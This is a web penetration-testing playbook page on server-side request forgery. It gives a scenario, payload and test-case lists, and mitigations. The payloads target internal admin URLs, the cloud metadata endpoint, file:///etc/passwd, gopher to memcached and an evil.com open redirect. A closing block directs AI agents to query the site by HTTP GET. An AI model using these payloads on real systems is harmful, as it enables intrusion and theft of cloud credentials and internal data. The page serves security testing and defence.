# SSRF

**Description:**\
Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests to internal or external network resources on behalf of the server. This can lead to unauthorized access to internal services, data exfiltration, and potential network enumeration.

**Example with Scenario:**\
Imagine a web application that fetches user-supplied URLs to display a thumbnail of the website. If the application does not validate the URL properly, an attacker can provide a URL pointing to an internal service, such as `http://localhost/admin`, allowing the attacker to access internal resources.

**Payloads:**

1. **Access Internal Services:**

   ```http
   http://localhost/admin
   http://127.0.0.1/admin
   http://internal-service.local/admin
   ```
2. **Access Metadata Services (Cloud environments):**

   <pre class="language-http"><code class="lang-http"><strong>http://169.254.169.254/latest/meta-data/
   </strong>http://169.254.169.254/computeMetadata/v1/
   </code></pre>
3. **Open Redirect Exploitation:**

   ```http
   http://example.com/?url=http://evil.com
   ```
4. **File Inclusion:**

   ```http
   file:///etc/passwd
   file:///C:/Windows/system32/drivers/etc/hosts
   ```
5. **Protocol Smuggling:**

   ```http
   gopher://localhost:11211/_stats
   ftp://ftp.example.com/file.txt
   ```
6. **DNS Rebinding:**

   ```http
   http://malicious.com (which resolves to an internal IP after initial DNS resolution)
   ```

**Test Cases:**

1. **Basic Internal Access:**

   ```http
   http://localhost:80
   http://127.0.0.1:8080
   ```
2. **Private IP Ranges:**

   ```http
   http://192.168.1.1:80
   http://10.0.0.1:8080
   ```
3. **Accessing Metadata Services:**

   ```http
   http://169.254.169.254/latest/meta-data/
   ```
4. **File Access:**

   ```http
   file:///etc/passwd
   file:///C:/Windows/System32/drivers/etc/hosts
   ```
5. **Alternative Protocols:**

   ```http
   ftp://example.com/file.txt
   gopher://localhost:11211/_stats
   ```
6. **Custom Headers:**

   ```http
   http://example.com -H 'Host: internal-service.local'
   ```

**Mitigation:**

1. **Input Validation and Whitelisting:**
   * Validate and sanitize user inputs. Only allow URLs that match a strict whitelist of allowed domains and protocols.
2. **Disable Unnecessary Protocols:**
   * Restrict the application from using protocols other than HTTP/HTTPS.
3. **Network Segmentation:**
   * Ensure the server cannot access internal services or sensitive resources directly.
4. **Metadata Service Protection:**
   * In cloud environments, limit access to metadata services through firewall rules or IAM roles.
5. **Use a URL Parsing Library:**
   * Use a robust URL parsing library to handle URL validation and prevent bypasses using encoding or other tricks.
6. **Timeouts and Retries:**
   * Implement timeouts and retry limits on server-side requests to avoid exploitation of long-running requests.
7. **Monitor and Alert:**
   * Set up monitoring and alerting for unusual server-side request patterns.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://playbook.sidthoviti.com/web-app-pentesting/ssrf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.